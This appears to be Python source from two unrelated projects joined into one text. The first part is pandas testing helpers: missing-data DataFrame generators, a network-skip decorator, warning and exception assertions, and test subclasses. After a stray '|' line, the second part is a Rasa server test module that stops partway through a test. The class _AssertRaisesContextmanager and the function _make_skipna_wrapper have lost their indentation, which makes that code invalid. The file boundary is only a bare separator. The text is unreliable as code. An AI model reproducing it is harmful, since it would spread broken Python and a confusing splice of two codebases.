        Float in (0, 1) that gives the percentage of non-missing numbers in
        the DataFrame.
    random_state : {np.random.RandomState, int}, optional
        Random number generator or random seed.

    See makeCustomDataframe for descriptions of the rest of the parameters.
    """
    df = makeCustomDataframe(
        nrows,
        ncols,
        c_idx_names=c_idx_names,
        r_idx_names=r_idx_names,
        c_idx_nlevels=c_idx_nlevels,
        r_idx_nlevels=r_idx_nlevels,
        data_gen_f=data_gen_f,
        c_ndupe_l=c_ndupe_l,
        r_ndupe_l=r_ndupe_l,
        dtype=dtype,
        c_idx_type=c_idx_type,
        r_idx_type=r_idx_type,
    )
    # knock out ~(1 - density) of the cells
    row_locs, col_locs = _create_missing_idx(nrows, ncols, density, random_state)
    df.values[row_locs, col_locs] = np.nan
    return df
def makeMissingDataframe(density=0.9, random_state=None):
    """Return makeDataFrame() output with ~(1 - density) of values set to NaN."""
    df = makeDataFrame()
    nrows, ncols = df.shape
    row_locs, col_locs = _create_missing_idx(
        nrows, ncols, density=density, random_state=random_state
    )
    df.values[row_locs, col_locs] = np.nan
    return df
class TestSubDict(dict):
    """Minimal dict subclass used to exercise handling of dict subclasses."""

    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
def optional_args(decorator):
    """allows a decorator to take optional positional and keyword arguments.
    Assumes that taking a single, callable, positional argument means that
    it is decorating a function, i.e. something like this::

        @my_decorator
        def function(): pass

    Calls decorator with decorator(f, *args, **kwargs)"""

    @wraps(decorator)
    def wrapper(*args, **kwargs):
        def dec(f):
            return decorator(f, *args, **kwargs)

        # bare `@decorator` usage: the single positional arg is the function
        if not kwargs and len(args) == 1 and callable(args[0]):
            func, args = args[0], []
            return dec(func)
        return dec

    return wrapper
# skip tests on exceptions with this message
# (substring-matched, case-insensitively, against the exception text)
_network_error_messages = (
    # 'urlopen error timed out',
    # 'timeout: timed out',
    # 'socket.timeout: timed out',
    "timed out",
    "Server Hangup",
    "HTTP Error 503: Service Unavailable",
    "502: Proxy Error",
    "HTTP Error 502: internal error",
    "HTTP Error 502",
    "HTTP Error 503",
    "HTTP Error 403",
    "HTTP Error 400",
    "Temporary failure in name resolution",
    "Name or service not known",
    "Connection refused",
    "certificate verify",
)
# or this e.errno/e.reason.errno
_network_errno_vals = (
    101,  # Network is unreachable
    111,  # Connection refused
    110,  # Connection timed out
    104,  # Connection reset Error
    54,  # Connection reset by peer
    60,  # urllib.error.URLError: [Errno 60] Connection timed out
)
# Both of the above shouldn't mask real issues such as 404's
# or refused connections (changed DNS).
# But some tests (test_data yahoo) contact incredibly flaky
# servers.
# and conditionally raise on these exception types
_network_error_classes = (IOError, http.client.HTTPException, TimeoutError)
def can_connect(url, error_classes=_network_error_classes):
    """Try to connect to the given url. True if succeeds, False if IOError
    raised

    Parameters
    ----------
    url : basestring
        The URL to try to connect to

    Returns
    -------
    connectable : bool
        Return True if no IOError (unable to connect) or URLError (bad url) was
        raised
    """
    try:
        with urlopen(url):
            pass
    except error_classes:
        return False
    return True
@optional_args
def network(
    t,
    url="http://www.google.com",
    raise_on_error=_RAISE_NETWORK_ERROR_DEFAULT,
    check_before_test=False,
    error_classes=_network_error_classes,
    skip_errnos=_network_errno_vals,
    _skip_on_messages=_network_error_messages,
):
    """
    Label a test as requiring network connection and, if an error is
    encountered, only raise if it does not find a network connection.

    In comparison to ``network``, this assumes an added contract to your test:
    you must assert that, under normal conditions, your test will ONLY fail if
    it does not have network connectivity.

    You can call this in 3 ways: as a standard decorator, with keyword
    arguments, or with a positional argument that is the url to check.

    Parameters
    ----------
    t : callable
        The test requiring network connectivity.
    url : path
        The url to test via ``pandas.io.common.urlopen`` to check
        for connectivity. Defaults to 'http://www.google.com'.
    raise_on_error : bool
        If True, never catches errors.
    check_before_test : bool
        If True, checks connectivity before running the test case.
    error_classes : tuple or Exception
        error classes to ignore. If not in ``error_classes``, raises the error.
        defaults to IOError. Be careful about changing the error classes here.
    skip_errnos : iterable of int
        Any exception that has .errno or .reason.errno set to one
        of these values will be skipped with an appropriate
        message.
    _skip_on_messages: iterable of string
        any exception e for which one of the strings is
        a substring of str(e) will be skipped with an appropriate
        message. Intended to suppress errors where an errno isn't available.

    Notes
    -----
    * ``raise_on_error`` supersedes ``check_before_test``

    Returns
    -------
    t : callable
        The decorated test ``t``, with checks for connectivity errors.

    Example
    -------

    Tests decorated with @network will fail if it's possible to make a network
    connection to another URL (defaults to google.com)::

      >>> from pandas.util.testing import network
      >>> from pandas.io.common import urlopen
      >>> @network
      ... def test_network():
      ...     with urlopen("rabbit://bonanza.com"):
      ...         pass
      Traceback
         ...
      URLError: <urlopen error unknown url type: rabit>

      You can specify alternative URLs::

        >>> @network("http://www.yahoo.com")
        ... def test_something_with_yahoo():
        ...    raise IOError("Failure Message")
        >>> test_something_with_yahoo()
        Traceback (most recent call last):
            ...
        IOError: Failure Message

      If you set check_before_test, it will check the url first and not run the
      test on failure::

        >>> @network("failing://url.blaher", check_before_test=True)
        ... def test_something():
        ...     print("I ran!")
        ...     raise ValueError("Failure")
        >>> test_something()
        Traceback (most recent call last):
            ...

    Errors not related to networking will always be raised.
    """
    from pytest import skip

    t.network = True

    @wraps(t)
    def wrapper(*args, **kwargs):
        if check_before_test and not raise_on_error:
            if not can_connect(url, error_classes):
                skip()
        try:
            return t(*args, **kwargs)
        except Exception as e:
            errno = getattr(e, "errno", None)
            # BUG FIX: the original tested ``hasattr(errno, "reason")``,
            # which is never true since errno is None/int; the intent is to
            # unwrap a URLError-style exception's ``reason`` attribute.
            if not errno and hasattr(e, "reason"):
                errno = getattr(e.reason, "errno", None)

            if errno in skip_errnos:
                skip(
                    "Skipping test due to known errno"
                    " and error {error}".format(error=e)
                )

            # BUG FIX: ``traceback.format_exc`` takes a ``limit`` argument,
            # not an exception; passing ``e`` always raised and fell back to
            # str(e). Calling it bare formats the current exception.
            try:
                e_str = traceback.format_exc()
            except Exception:
                e_str = str(e)

            if any(m.lower() in e_str.lower() for m in _skip_on_messages):
                skip(
                    "Skipping test because exception "
                    "message is known and error {error}".format(error=e)
                )

            if not isinstance(e, error_classes):
                raise

            if raise_on_error or can_connect(url, error_classes):
                raise
            else:
                skip(
                    "Skipping test due to lack of connectivity"
                    " and error {error}".format(error=e)
                )

    return wrapper


with_connectivity_check = network
def assert_raises_regex(_exception, _regexp, _callable=None, *args, **kwargs):
    r"""
    Check that the specified Exception is raised and that the error message
    matches a given regular expression pattern. This may be a regular
    expression object or a string containing a regular expression suitable
    for use by `re.search()`. This is a port of the `assertRaisesRegexp`
    function from unittest in Python 2.7.

    .. deprecated:: 0.24.0
        Use `pytest.raises` instead.

    Examples
    --------
    >>> assert_raises_regex(ValueError, 'invalid literal for.*XYZ', int, 'XYZ')
    >>> import re
    >>> assert_raises_regex(ValueError, re.compile('literal'), int, 'XYZ')

    If an exception of a different type is raised, it bubbles up.

    >>> assert_raises_regex(TypeError, 'literal', int, 'XYZ')
    Traceback (most recent call last):
        ...
    ValueError: invalid literal for int() with base 10: 'XYZ'
    >>> dct = dict()
    >>> assert_raises_regex(KeyError, 'pear', dct.__getitem__, 'apple')
    Traceback (most recent call last):
        ...
    AssertionError: "pear" does not match "'apple'"

    You can also use this in a with statement.

    >>> with assert_raises_regex(TypeError, r'unsupported operand type\(s\)'):
    ...     1 + {}
    >>> with assert_raises_regex(TypeError, 'banana'):
    ...     'apple'[0] = 'b'
    Traceback (most recent call last):
        ...
    AssertionError: "banana" does not match "'str' object does not support \
item assignment"
    """
    warnings.warn(
        (
            "assert_raises_regex has been deprecated and will "
            "be removed in the next release. Please use "
            "`pytest.raises` instead."
        ),
        FutureWarning,
        stacklevel=2,
    )
    manager = _AssertRaisesContextmanager(exception=_exception, regexp=_regexp)
    # without a callable, behave as a context manager
    if _callable is None:
        return manager
    with manager:
        _callable(*args, **kwargs)
class _AssertRaisesContextmanager:
"""
Context manager behind `assert_raises_regex`.
"""
def __init__(self, exception, regexp=None):
"""
Initialize an _AssertRaisesContextManager instance.
Parameters
----------
exception : class
The expected Exception class.
regexp : str, default None
The regex to compare against the Exception message.
"""
self.exception = exception
if regexp is not None and not hasattr(regexp, "search"):
regexp = re.compile(regexp, re.DOTALL)
self.regexp = regexp
def __enter__(self):
return self
def __exit__(self, exc_type, exc_value, trace_back):
expected = self.exception
if not exc_type:
exp_name = getattr(expected, "__name__", str(expected))
raise AssertionError("{name} not raised.".format(name=exp_name))
return self.exception_matches(exc_type, exc_value, trace_back)
def exception_matches(self, exc_type, exc_value, trace_back):
"""
Check that the Exception raised matches the expected Exception
and expected error message regular expression.
Parameters
----------
exc_type : class
The type of Exception raised.
exc_value : Exception
The instance of `exc_type` raised.
trace_back : stack trace object
The traceback object associated with `exc_value`.
Returns
-------
is_matched : bool
Whether or not the Exception raised matches the expected
Exception class and expected error message regular expression.
Raises
------
AssertionError : The error message provided does not match
the expected error message regular expression.
"""
if issubclass(exc_type, self.exception):
if self.regexp is not None:
val = str(exc_value)
if not self.regexp.search(val):
msg = '"{pat}" does not match "{val}"'.format(
pat=self.regexp.pattern, val=val
)
e = AssertionError(msg)
raise_with_traceback(e, trace_back)
return True
else:
# Failed, so allow Exception to bubble up.
return False
@contextmanager
def assert_produces_warning(
    expected_warning=Warning,
    filter_level="always",
    clear=None,
    check_stacklevel=True,
    raise_on_extra_warnings=True,
):
    """
    Context manager verifying that the wrapped code emits the expected warning.

    Fails if the expected warning class is never seen and, optionally, if any
    warning of another class is seen.  Thin wrapper around
    ``warnings.catch_warnings``.

    Parameters
    ----------
    expected_warning : {Warning, False, None}, default Warning
        Warning class that must be emitted.  Pass ``False`` or ``None`` to
        assert that no warning is produced.
    filter_level : str or None, default "always"
        Filter action handed to ``warnings.simplefilter``; one of "error",
        "ignore", "always", "default", "module" or "once".
    clear : str, default None
        Module (or list of modules) whose ``__warningregistry__`` is emptied
        first, so previously-raised warnings are re-emitted and caught here.
    check_stacklevel : bool, default True
        For FutureWarning/DeprecationWarning, additionally assert the warning
        points at the calling line, i.e. ``stacklevel`` was set correctly.
    raise_on_extra_warnings : bool, default True
        Whether warnings of an unexpected class should fail the check.

    Notes
    -----
    This is *not* thread-safe.
    """
    __tracebackhide__ = True
    with warnings.catch_warnings(record=True) as caught:
        if clear is not None:
            # Empty the registries up front so that previously-shown warnings
            # are guaranteed to be re-emitted (and therefore recorded) here.
            modules = clear if is_list_like(clear) else [clear]
            for module in modules:
                try:
                    module.__warningregistry__.clear()
                except Exception:
                    pass

        matched_expected = False
        warnings.simplefilter(filter_level)
        yield caught

        unexpected = []
        for record in caught:
            if expected_warning and issubclass(record.category, expected_warning):
                matched_expected = True
                if check_stacklevel and issubclass(
                    record.category, (FutureWarning, DeprecationWarning)
                ):
                    from inspect import getframeinfo, stack

                    # stack()[2] is the frame that ran the ``with`` body; a
                    # correct ``stacklevel`` makes the warning point there.
                    caller = getframeinfo(stack()[2][0])
                    msg = (
                        "Warning not set with correct stacklevel. "
                        "File where warning is raised: {actual} != "
                        "{caller}. Warning message: {message}"
                    ).format(
                        actual=record.filename,
                        caller=caller.filename,
                        message=record.message,
                    )
                    assert record.filename == caller.filename, msg
            else:
                unexpected.append(
                    (
                        record.category.__name__,
                        record.message,
                        record.filename,
                        record.lineno,
                    )
                )

        if expected_warning:
            msg = "Did not see expected warning of class {name!r}.".format(
                name=expected_warning.__name__
            )
            assert matched_expected, msg
        if raise_on_extra_warnings and unexpected:
            raise AssertionError(
                "Caused unexpected warning(s): {!r}.".format(unexpected)
            )
class RNGContext:
    """
    Context manager that seeds the numpy global random number generator and
    restores the previous RNG state upon exiting the context.

    Parameters
    ----------
    seed : int
        Seed for numpy.random.seed

    Examples
    --------
    with RNGContext(42):
        np.random.randn()
    """

    def __init__(self, seed):
        self.seed = seed

    def __enter__(self):
        # remember the global state so __exit__ can restore it
        self.start_state = np.random.get_state()
        np.random.seed(self.seed)
        # Improvement: return self so the manager can be bound with ``as``
        # (backward compatible — the return value was previously None and
        # nothing could rely on it).
        return self

    def __exit__(self, exc_type, exc_value, traceback):
        # restore the saved state even if the body raised
        np.random.set_state(self.start_state)
@contextmanager
def with_csv_dialect(name, **kwargs):
    """
    Context manager to temporarily register a CSV dialect for parsing CSV.

    Parameters
    ----------
    name : str
        The name of the dialect.
    kwargs : mapping
        The parameters for the dialect.

    Raises
    ------
    ValueError : the name of the dialect conflicts with a builtin one.

    See Also
    --------
    csv : Python's CSV library.
    """
    import csv

    _BUILTIN_DIALECTS = {"excel", "excel-tab", "unix"}

    if name in _BUILTIN_DIALECTS:
        raise ValueError("Cannot override builtin dialect.")

    csv.register_dialect(name, **kwargs)
    # Bug fix: unregister in a ``finally`` so the dialect does not leak into
    # the global registry when the ``with`` body raises.
    try:
        yield
    finally:
        csv.unregister_dialect(name)
@contextmanager
def use_numexpr(use, min_elements=None):
    """
    Context manager to temporarily toggle pandas' numexpr usage and the
    minimum element count for engaging it, restoring both on exit.

    Parameters
    ----------
    use : bool
        Whether to enable numexpr-backed expression evaluation.
    min_elements : int, default None
        Minimum number of elements before numexpr kicks in; defaults to the
        current ``expr._MIN_ELEMENTS`` setting.
    """
    from pandas.core.computation import expressions as expr

    if min_elements is None:
        min_elements = expr._MIN_ELEMENTS

    olduse = expr._USE_NUMEXPR
    oldmin = expr._MIN_ELEMENTS
    expr.set_use_numexpr(use)
    expr._MIN_ELEMENTS = min_elements
    # Bug fix: restore the previous settings in a ``finally`` so they are not
    # left clobbered when the ``with`` body raises.
    try:
        yield
    finally:
        expr._MIN_ELEMENTS = oldmin
        expr.set_use_numexpr(olduse)
def test_parallel(num_threads=2, kwargs_list=None):
    """Decorator that runs the decorated function several times in parallel.

    Parameters
    ----------
    num_threads : int, optional
        How many threads run the function concurrently.
    kwargs_list : list of dicts, optional
        Per-thread keyword-argument overrides, merged over the call's kwargs.

    Notes
    -----
    The decorated function's return value is discarded.
    Original from scikit-image:
    https://github.com/scikit-image/scikit-image/pull/1519
    """
    assert num_threads > 0
    has_kwargs_list = kwargs_list is not None
    if has_kwargs_list:
        assert len(kwargs_list) == num_threads
    import threading

    def wrapper(func):
        @wraps(func)
        def inner(*args, **kwargs):
            def kwargs_for(idx):
                # merge the per-thread overrides on top of the call kwargs
                if has_kwargs_list:
                    return dict(kwargs, **kwargs_list[idx])
                return kwargs

            workers = [
                threading.Thread(target=func, args=args, kwargs=kwargs_for(idx))
                for idx in range(num_threads)
            ]
            for worker in workers:
                worker.start()
            for worker in workers:
                worker.join()

        return inner

    return wrapper
class SubclassedSeries(Series):
    """Series subclass used in tests to check subclass/metadata preservation."""

    # attributes that pandas propagates from source to result objects
    _metadata = ["testattr", "name"]

    @property
    def _constructor(self):
        # same-dimension results stay SubclassedSeries
        return SubclassedSeries

    @property
    def _constructor_expanddim(self):
        # expanding to 2D produces the companion DataFrame subclass
        return SubclassedDataFrame
class SubclassedDataFrame(DataFrame):
    """DataFrame subclass used in tests to check subclass/metadata preservation."""

    # attributes that pandas propagates from source to result objects
    _metadata = ["testattr"]

    @property
    def _constructor(self):
        # same-dimension results stay SubclassedDataFrame
        return SubclassedDataFrame

    @property
    def _constructor_sliced(self):
        # slicing down to 1D produces the companion Series subclass
        return SubclassedSeries
class SubclassedSparseSeries(pd.SparseSeries):
    """SparseSeries subclass used in tests to check subclass preservation."""

    # attributes that pandas propagates from source to result objects
    _metadata = ["testattr"]

    @property
    def _constructor(self):
        # same-dimension results stay SubclassedSparseSeries
        return SubclassedSparseSeries

    @property
    def _constructor_expanddim(self):
        # expanding to 2D produces the companion sparse DataFrame subclass
        return SubclassedSparseDataFrame
class SubclassedSparseDataFrame(pd.SparseDataFrame):
    """SparseDataFrame subclass used in tests to check subclass preservation."""

    # attributes that pandas propagates from source to result objects
    _metadata = ["testattr"]

    @property
    def _constructor(self):
        # same-dimension results stay SubclassedSparseDataFrame
        return SubclassedSparseDataFrame

    @property
    def _constructor_sliced(self):
        # slicing down to 1D produces the companion sparse Series subclass
        return SubclassedSparseSeries
class SubclassedCategorical(Categorical):
    """Categorical subclass used in tests to check subclass preservation."""

    @property
    def _constructor(self):
        # results stay SubclassedCategorical
        return SubclassedCategorical
@contextmanager
def set_timezone(tz):
    """Temporarily set the process timezone via the ``TZ`` environment variable.

    The previous value of ``TZ`` (or its absence) is restored on exit, even if
    the body raises.  Relies on ``time.tzset``, which is only available on
    Unix-like platforms.

    Parameters
    ----------
    tz : str
        A string representing a valid timezone, e.g. ``'US/Eastern'``.
    """
    import os
    import time

    def _activate(zone):
        # ``None`` means "no TZ override": drop the variable if present so the
        # system default applies again.
        if zone is None:
            os.environ.pop("TZ", None)
        else:
            os.environ["TZ"] = zone
        time.tzset()

    previous = os.environ.get("TZ")
    _activate(tz)
    try:
        yield
    finally:
        _activate(previous)
def _make_skipna_wrapper(alternative, skipna_alternative=None):
"""Create a function for calling on an array.
Parameters
----------
alternative : function
The function to be called on the array with no NaNs.
Only used when 'skipna_alternative' is None.
skipna_alternative : function
The function to be called on the original array
Returns
-------
skipna_wrapper : function
"""
if skipna_alternative:
def skipna_wrapper(x):
return skipna_alternative(x.values)
else:
def skipna_wrapper(x):
nona = x.dropna()
if len(nona) == 0:
return np.nan
return alternative(nona)
return skipna_wrapper
def convert_rows_list_to_csv_str(rows_list):
    """
    Convert list of CSV rows to single CSV-formatted string for current OS.

    This method is used for creating expected value of to_csv() method.

    Parameters
    ----------
    rows_list : list
        The list of string. Each element represents the row of csv.

    Returns
    -------
    expected : string
        Expected output of to_csv() in current OS
    """
    # every row, including the last, is terminated with the OS line separator
    terminator = os.linesep
    return terminator.join(rows_list) + terminator
|
test_server.py | import asyncio
import json
import os
import time
import urllib.parse
import uuid
from contextlib import ExitStack
from http import HTTPStatus
from multiprocessing import Process, Manager
from multiprocessing.managers import DictProxy
from pathlib import Path
from typing import List, Text, Type, Generator, NoReturn, Dict, Optional
from unittest.mock import Mock, ANY
import pytest
import requests
from _pytest import pathlib
from _pytest.monkeypatch import MonkeyPatch
from aioresponses import aioresponses
from freezegun import freeze_time
from mock import MagicMock
from ruamel.yaml import StringIO
from sanic import Sanic
from sanic.testing import SanicASGITestClient
import rasa
import rasa.constants
import rasa.core.jobs
import rasa.nlu
import rasa.server
import rasa.shared.constants
import rasa.shared.utils.io
import rasa.utils.io
from rasa.core import utils
from rasa.core.agent import Agent, load_agent
from rasa.core.channels import (
channel,
CollectingOutputChannel,
RestInput,
SlackInput,
CallbackInput,
)
from rasa.core.channels.slack import SlackBot
from rasa.core.tracker_store import InMemoryTrackerStore
from rasa.model import unpack_model
from rasa.nlu.test import CVEvaluationResult
from rasa.shared.core import events
from rasa.shared.core.constants import (
ACTION_SESSION_START_NAME,
ACTION_LISTEN_NAME,
REQUESTED_SLOT,
SESSION_START_METADATA_SLOT,
)
from rasa.shared.core.domain import Domain, SessionConfig
from rasa.shared.core.events import (
Event,
UserUttered,
SlotSet,
BotUttered,
ActionExecuted,
SessionStarted,
)
from rasa.shared.core.trackers import DialogueStateTracker
from rasa.shared.nlu.constants import INTENT_NAME_KEY
from rasa.train import TrainingResult
from rasa.utils.endpoints import EndpointConfig
from tests.core.conftest import DEFAULT_STACK_CONFIG
from tests.nlu.utilities import ResponseTest
from tests.utilities import json_of_latest_request, latest_request
# a couple of event instances that we can use for testing
test_events = [
    Event.from_parameters(
        {
            "event": UserUttered.type_name,
            "text": "/goodbye",
            "parse_data": {
                "intent": {"confidence": 1.0, INTENT_NAME_KEY: "greet"},
                "entities": [],
            },
        }
    ),
    BotUttered("Welcome!", {"test": True}),
    # the same slot is set with an int and then a str on purpose: slot values
    # of different types must round-trip through the server unchanged
    SlotSet("cuisine", 34),
    SlotSet("cuisine", "34"),
    SlotSet("location", None),
    SlotSet("location", [34, "34", None]),
]

# sequence of events expected at the beginning of trackers
session_start_sequence: List[Event] = [
    ActionExecuted(ACTION_SESSION_START_NAME),
    SessionStarted(),
    ActionExecuted(ACTION_LISTEN_NAME),
]
@pytest.fixture
def rasa_app_without_api(rasa_server_without_api: Sanic) -> SanicASGITestClient:
    """ASGI test client for the ``rasa_server_without_api`` server fixture."""
    return rasa_server_without_api.asgi_client
@pytest.fixture
def rasa_app(rasa_server: Sanic) -> SanicASGITestClient:
    """ASGI test client for the default ``rasa_server`` fixture."""
    return rasa_server.asgi_client
@pytest.fixture
def rasa_app_nlu(rasa_nlu_server: Sanic) -> SanicASGITestClient:
    """ASGI test client for the ``rasa_nlu_server`` (NLU-only) fixture."""
    return rasa_nlu_server.asgi_client
@pytest.fixture
def rasa_app_core(rasa_core_server: Sanic) -> SanicASGITestClient:
    """ASGI test client for the ``rasa_core_server`` (core-only) fixture."""
    return rasa_core_server.asgi_client
@pytest.fixture
def rasa_secured_app(rasa_server_secured: Sanic) -> SanicASGITestClient:
    """ASGI test client for the ``rasa_server_secured`` (auth-enabled) fixture."""
    return rasa_server_secured.asgi_client
@pytest.fixture()
async def tear_down_scheduler() -> Generator[None, None, None]:
    """After the test, clear the cached scheduler in ``rasa.core.jobs``.

    This keeps a scheduler created by one test from leaking into later tests.
    """
    yield None
    rasa.core.jobs.__scheduler = None
async def test_root(rasa_app: SanicASGITestClient):
    """GET / answers 200 with the Rasa greeting banner."""
    _, response = await rasa_app.get("/")
    assert response.status == HTTPStatus.OK
    banner = response.text
    assert banner.startswith("Hello from Rasa:")
async def test_root_without_enable_api(rasa_app_without_api: SanicASGITestClient):
    """GET / answers 200 with the greeting even when the API is not enabled."""
    _, response = await rasa_app_without_api.get("/")
    assert response.status == HTTPStatus.OK
    banner = response.text
    assert banner.startswith("Hello from Rasa:")
async def test_root_secured(rasa_secured_app: SanicASGITestClient):
    """GET / answers 200 with the greeting even on a secured server."""
    _, response = await rasa_secured_app.get("/")
    assert response.status == HTTPStatus.OK
    banner = response.text
    assert banner.startswith("Hello from Rasa:")
async def test_version(rasa_app: SanicASGITestClient):
    """/version reports the running Rasa version and the minimum compatible one."""
    _, response = await rasa_app.get("/version")
    assert response.status == HTTPStatus.OK
    payload = response.json()
    assert payload.get("version") == rasa.__version__
    expected_minimum = rasa.constants.MINIMUM_COMPATIBLE_VERSION
    assert payload.get("minimum_compatible_version") == expected_minimum
async def test_status(rasa_app: SanicASGITestClient, trained_rasa_model: Text):
    """/status exposes the fingerprint and the path of the loaded model file."""
    _, response = await rasa_app.get("/status")
    assert response.status == HTTPStatus.OK
    payload = response.json()
    assert "fingerprint" in payload
    model_file = payload["model_file"]
    assert model_file == trained_rasa_model
    assert os.path.isfile(model_file)
async def test_status_nlu_only(
    rasa_app_nlu: SanicASGITestClient, trained_nlu_model: Text
):
    """/status on an NLU-only server still exposes fingerprint and model file."""
    _, response = await rasa_app_nlu.get("/status")
    assert response.status == HTTPStatus.OK
    payload = response.json()
    assert "fingerprint" in payload
    assert "model_file" in payload
    assert payload["model_file"] == trained_nlu_model
async def test_status_secured(rasa_secured_app: SanicASGITestClient):
    """Without credentials, /status on a secured server is rejected with 401."""
    _, response = await rasa_secured_app.get("/status")
    status = response.status
    assert status == HTTPStatus.UNAUTHORIZED
async def test_status_not_ready_agent(rasa_app: SanicASGITestClient):
    """/status answers 409 when no agent is loaded on the server."""
    # simulate a server whose agent failed to load
    rasa_app.app.agent = None
    _, response = await rasa_app.get("/status")
    assert response.status == HTTPStatus.CONFLICT
@pytest.fixture
def shared_statuses() -> DictProxy:
    """Cross-process dict used to exchange status flags with child processes."""
    return Manager().dict()
@pytest.fixture
def background_server(
    shared_statuses: DictProxy, tmpdir: pathlib.Path, monkeypatch: MonkeyPatch
) -> Generator[Process, None, None]:
    """Provide a (not yet started) server process whose training blocks.

    The caller is responsible for ``start()``-ing the process; the fixture
    terminates it on teardown.
    """
    # Create a fake model archive which the mocked train function can return
    fake_model = Path(tmpdir) / "fake_model.tar.gz"
    fake_model.touch()
    fake_model_path = str(fake_model)

    # Fake training function which blocks until we tell it to stop blocking
    # If we can send a status request while this is blocking, we can be sure that the
    # actual training is also not blocking
    async def mocked_training_function(*_, **__) -> TrainingResult:
        # Tell the others that we are now blocking
        shared_statuses["started_training"] = True
        # Block until somebody tells us to not block anymore
        while shared_statuses.get("stop_training") is not True:
            time.sleep(1)

        return TrainingResult(model=fake_model_path)

    def run_server(monkeypatch: MonkeyPatch) -> NoReturn:
        import sys

        # Swap the real training entry point for the blocking stub above.
        monkeypatch.setattr(
            sys.modules["rasa.train"], "train_async", mocked_training_function,
        )

        from rasa import __main__

        # start the full server with the HTTP API enabled
        sys.argv = ["rasa", "run", "--enable-api"]
        __main__.main()

    server = Process(target=run_server, args=(monkeypatch,))
    yield server
    server.terminate()
@pytest.fixture()
def training_request(
    shared_statuses: DictProxy, tmp_path: Path
) -> Generator[Process, None, None]:
    """Provide a (not yet started) process that POSTs a /model/train request.

    The resulting HTTP status code is published to
    ``shared_statuses["training_result"]``.
    """

    def send_request() -> None:
        payload = {}
        project_path = Path("examples") / "formbot"
        for file in [
            "domain.yml",
            "config.yml",
            Path("data") / "rules.yml",
            Path("data") / "stories.yml",
            Path("data") / "nlu.yml",
        ]:
            full_path = project_path / file
            # Read in as dictionaries to avoid that keys, which are specified in
            # multiple files (such as 'version'), clash.
            content = rasa.shared.utils.io.read_yaml_file(full_path)
            payload.update(content)

        concatenated_payload_file = tmp_path / "concatenated.yml"
        rasa.shared.utils.io.write_yaml(payload, concatenated_payload_file)

        payload_as_yaml = concatenated_payload_file.read_text()

        response = requests.post(
            "http://localhost:5005/model/train",
            data=payload_as_yaml,
            headers={"Content-type": rasa.server.YAML_CONTENT_TYPE},
            params={"force_training": True},
        )
        shared_statuses["training_result"] = response.status_code

    train_request = Process(target=send_request)
    yield train_request
    train_request.terminate()
# Due to unknown reasons this test can not be run in pycharm, it
# results in segfaults...will skip in that case - test will still get run on CI.
# It also doesn't run on Windows because of Process-related calls and an attempt
# to start/terminate a process. We will investigate this case further later:
# https://github.com/RasaHQ/rasa/issues/6302
@pytest.mark.skipif("PYCHARM_HOSTED" in os.environ, reason="results in segfault")
@pytest.mark.skip_on_windows
def test_train_status_is_not_blocked_by_training(
    background_server: Process, shared_statuses: DictProxy, training_request: Process
):
    """While a (mocked, blocking) training runs, /status must stay responsive."""
    background_server.start()

    def is_server_ready() -> bool:
        # probe /status; any connection error just means "not ready yet"
        try:
            return (
                requests.get("http://localhost:5005/status").status_code
                == HTTPStatus.OK
            )
        except Exception:
            return False

    # wait until server is up before sending train request and status test loop
    start = time.time()
    while not is_server_ready() and time.time() - start < 60:
        time.sleep(1)

    assert is_server_ready()

    training_request.start()

    # Wait until the blocking training function was called
    start = time.time()
    while (
        shared_statuses.get("started_training") is not True and time.time() - start < 60
    ):
        time.sleep(1)

    # Check if the number of currently running trainings was incremented
    response = requests.get("http://localhost:5005/status")
    assert response.status_code == HTTPStatus.OK
    assert response.json()["num_active_training_jobs"] == 1

    # Tell the blocking training function to stop
    shared_statuses["stop_training"] = True

    start = time.time()
    while shared_statuses.get("training_result") is None and time.time() - start < 60:
        time.sleep(1)
    assert shared_statuses.get("training_result")

    # Check that the training worked correctly
    assert shared_statuses["training_result"] == HTTPStatus.OK

    # Check if the number of currently running trainings was decremented
    response = requests.get("http://localhost:5005/status")
    assert response.status_code == HTTPStatus.OK
    assert response.json()["num_active_training_jobs"] == 0
@pytest.mark.parametrize(
    "response_test",
    [
        ResponseTest(
            "/model/parse",
            {
                "entities": [],
                "intent": {"confidence": 1.0, INTENT_NAME_KEY: "greet"},
                "text": "hello",
            },
            payload={"text": "hello"},
        ),
        # NOTE(review): this case is identical to the first one — presumably one
        # of them was meant to vary; confirm against the test's intent.
        ResponseTest(
            "/model/parse",
            {
                "entities": [],
                "intent": {"confidence": 1.0, INTENT_NAME_KEY: "greet"},
                "text": "hello",
            },
            payload={"text": "hello"},
        ),
        # non-ASCII text must survive the round trip unchanged
        ResponseTest(
            "/model/parse",
            {
                "entities": [],
                "intent": {"confidence": 1.0, INTENT_NAME_KEY: "greet"},
                "text": "hello ńöñàśçií",
            },
            payload={"text": "hello ńöñàśçií"},
        ),
    ],
)
async def test_parse(rasa_app: SanicASGITestClient, response_test: ResponseTest):
    """POST /model/parse returns the expected entities, intent and text."""
    _, response = await rasa_app.post(
        response_test.endpoint, json=response_test.payload
    )
    rjs = response.json()
    assert response.status == HTTPStatus.OK
    assert all(prop in rjs for prop in ["entities", "intent", "text"])
    assert rjs["entities"] == response_test.expected_response["entities"]
    assert rjs["text"] == response_test.expected_response["text"]
    assert rjs["intent"] == response_test.expected_response["intent"]
@pytest.mark.parametrize(
    "response_test",
    [
        ResponseTest(
            "/model/parse?emulation_mode=wit",
            {
                "entities": [],
                "intent": {"confidence": 1.0, INTENT_NAME_KEY: "greet"},
                "text": "hello",
            },
            payload={"text": "hello"},
        ),
        ResponseTest(
            "/model/parse?emulation_mode=dialogflow",
            {
                "entities": [],
                "intent": {"confidence": 1.0, INTENT_NAME_KEY: "greet"},
                "text": "hello",
            },
            payload={"text": "hello"},
        ),
        ResponseTest(
            "/model/parse?emulation_mode=luis",
            {
                "entities": [],
                "intent": {"confidence": 1.0, INTENT_NAME_KEY: "greet"},
                "text": "hello ńöñàśçií",
            },
            payload={"text": "hello ńöñàśçií"},
        ),
    ],
)
async def test_parse_with_different_emulation_mode(
    rasa_app: SanicASGITestClient, response_test: ResponseTest
):
    """/model/parse accepts each supported ``emulation_mode`` with 200.

    Only the status code is checked here; the emulated payload shapes differ
    per mode and are not asserted.
    """
    _, response = await rasa_app.post(
        response_test.endpoint, json=response_test.payload
    )
    assert response.status == HTTPStatus.OK
async def test_parse_without_nlu_model(rasa_app_core: SanicASGITestClient):
    """A core-only server still answers /model/parse with the standard keys."""
    _, response = await rasa_app_core.post("/model/parse", json={"text": "hello"})
    assert response.status == HTTPStatus.OK

    parsed = response.json()
